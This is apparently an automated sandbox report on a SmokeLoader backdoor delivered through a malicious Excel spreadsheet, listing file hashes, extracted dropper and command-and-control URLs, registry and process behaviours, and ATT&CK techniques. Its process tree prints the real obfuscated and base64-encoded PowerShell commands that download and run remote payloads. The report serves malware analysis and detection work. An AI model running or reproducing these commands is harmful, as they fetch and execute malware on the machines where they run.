smokeloader | 5336244ea1a4dd0d73a219721a6105f5976af420f4c4e16c6dae5383596d0576

General

Target

TRD-ENQ-70-2499-26-SIS.xls
Size

155KB
MD5

a9f22ee486f5effd62a8880f3472c088
SHA1

eb8531c54d4a11add906fbadba9fc2969ed8fc53
SHA256

ba7022816b45ca6c627869743cb759207d577d774ac0d81edb5bf20445941115
SHA512

88fdd7caa527e34ddfd765b04a9f82a7f4145ed6b6a629e418a28f4c57778c43b8b7402f70549e8a00d4171eb9b7166b72595b951a145b1361df4fac26ab88e9

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://paste.ee/r/w0yLV

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/co0r5.txt

Extracted

Family

smokeloader

Version

2018

C2

http://cmcare.ca/1/

rc4.i32

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2696	724	powershell.exe	EXCEL.EXE

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

23 2696 powershell.exe
24 2696 powershell.exe
27 1832 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

itunes.exe

pid process

896 itunes.exe

flow	pid	process
23	2696	powershell.exe
24	2696	powershell.exe
27	1832	powershell.exe

pid	process
896	itunes.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

itunes.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	itunes.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	itunes.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

724 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2696 powershell.exe
2696 powershell.exe
2696 powershell.exe
1832 powershell.exe
1832 powershell.exe
1832 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

itunes.exe

pid process

896 itunes.exe
896 itunes.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2696 powershell.exe
Token: SeDebugPrivilege 1832 powershell.exe

pid	process
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
1832	powershell.exe
1832	powershell.exe
1832	powershell.exe

pid	process
896	itunes.exe
896	itunes.exe

description	pid	process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE
724	EXCEL.EXE

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

EXCEL.EXEpowershell.exepowershell.exe

description	pid	process	target process
PID 724 wrote to memory of 2696	724	EXCEL.EXE	powershell.exe
PID 724 wrote to memory of 2696	724	EXCEL.EXE	powershell.exe
PID 2696 wrote to memory of 1832	2696	powershell.exe	powershell.exe
PID 2696 wrote to memory of 1832	2696	powershell.exe	powershell.exe
PID 1832 wrote to memory of 896	1832	powershell.exe	itunes.exe
PID 1832 wrote to memory of 896	1832	powershell.exe	itunes.exe
PID 1832 wrote to memory of 896	1832	powershell.exe	itunes.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TRD-ENQ-70-2499-26-SIS.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/w0yLV')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYwBvADAAcgA1AC4AdAB4AHQAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAaQB0AHUAbgBlAHMALgBlAHgAZQAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAaQB0AHUAbgBlAHMALgBlAHgAZQAdIA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832

C:\Users\Admin\AppData\Local\Temp\itunes.exe
"C:\Users\Admin\AppData\Local\Temp\itunes.exe"
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
014952e8b61042548f171084aa7b0980

SHA1
dec848bd22300ef862e72c8597b9abc684c6fbbe

SHA256
0505787ff8ba647b8bc24e747337a6b65e365494fd3f9b2c16b14f86f560e877

SHA512
f81fdb848495daa9ff2b53f6e5f65b2675736441a079a86e89b950eb122c9f93eed7ae78bc905e3a99208aedbb486b269cc06f45e4309c67f654c4d0d3d57ba7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
561387c6f006181f8b0235d96024d36a

SHA1
7c94bba9573414fc71ec32b2089902dbd9424fa1

SHA256
ee050ef4f7caff3b417eaf32ff1fc19a98b00704cacee16d53e906129d8e9995

SHA512
f79c58743c5a949bedead74a3fad679c80ed9071c7dd771afd17066e618768fe0e13a913e79fdf81edbf36c153a464995a37974fa2f0535d004908398040e050

Download Submit
C:\Users\Admin\AppData\Local\Temp\itunes.exe
MD5
a207204a635bec1ee31be6dd9f3802e0

SHA1
319da3a5c6b013a0c2dfaa8e954b1cd936f8336f

SHA256
0da52a9b8788344a1b1cbfd7505d1374367b5eea32153ceb522c4b41100fb940

SHA512
33eb8d57fd64627fe307731eb00cb3ee4de37137e51114d527d2e0e031cf575217c55dc65cd54d8e19410f8394acfa244742929a0bc9acc7686a0837c67b6ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\itunes.exe
MD5
a207204a635bec1ee31be6dd9f3802e0

SHA1
319da3a5c6b013a0c2dfaa8e954b1cd936f8336f

SHA256
0da52a9b8788344a1b1cbfd7505d1374367b5eea32153ceb522c4b41100fb940

SHA512
33eb8d57fd64627fe307731eb00cb3ee4de37137e51114d527d2e0e031cf575217c55dc65cd54d8e19410f8394acfa244742929a0bc9acc7686a0837c67b6ed9

Download Submit
memory/724-2-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

Filesize
64KB

Download
memory/724-3-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

Filesize
64KB

Download
memory/724-4-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

Filesize
64KB

Download
memory/724-5-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

Filesize
64KB

Download
memory/724-6-0x00007FFC33D00000-0x00007FFC34337000-memory.dmp

Filesize
6.2MB

Download
memory/896-21-0x0000000000000000-mapping.dmp

Download
memory/1832-14-0x0000000000000000-mapping.dmp

Download
memory/1832-19-0x000002AF52853000-0x000002AF52855000-memory.dmp

Filesize
8KB

Download
memory/1832-20-0x000002AF52856000-0x000002AF52858000-memory.dmp

Filesize
8KB

Download
memory/1832-15-0x00007FFC2B330000-0x00007FFC2BD1C000-memory.dmp

Filesize
9.9MB

Download
memory/1832-18-0x000002AF52850000-0x000002AF52852000-memory.dmp

Filesize
8KB

Download
memory/2696-11-0x00000192C3360000-0x00000192C3362000-memory.dmp

Filesize
8KB

Download
memory/2696-12-0x00000192C3363000-0x00000192C3365000-memory.dmp

Filesize
8KB

Download
memory/2696-13-0x00000192C3366000-0x00000192C3368000-memory.dmp

Filesize
8KB

Download
memory/2696-10-0x00000192DBD40000-0x00000192DBD41000-memory.dmp

Filesize
4KB

Download
memory/2696-9-0x00000192DBA00000-0x00000192DBA01000-memory.dmp

Filesize
4KB

Download
memory/2696-8-0x00007FFC2B330000-0x00007FFC2BD1C000-memory.dmp

Filesize
9.9MB

Download
memory/2696-7-0x0000000000000000-mapping.dmp

Download
memory/3028-26-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/3028-27-0x00000000008A0000-0x00000000008B5000-memory.dmp

Filesize
84KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads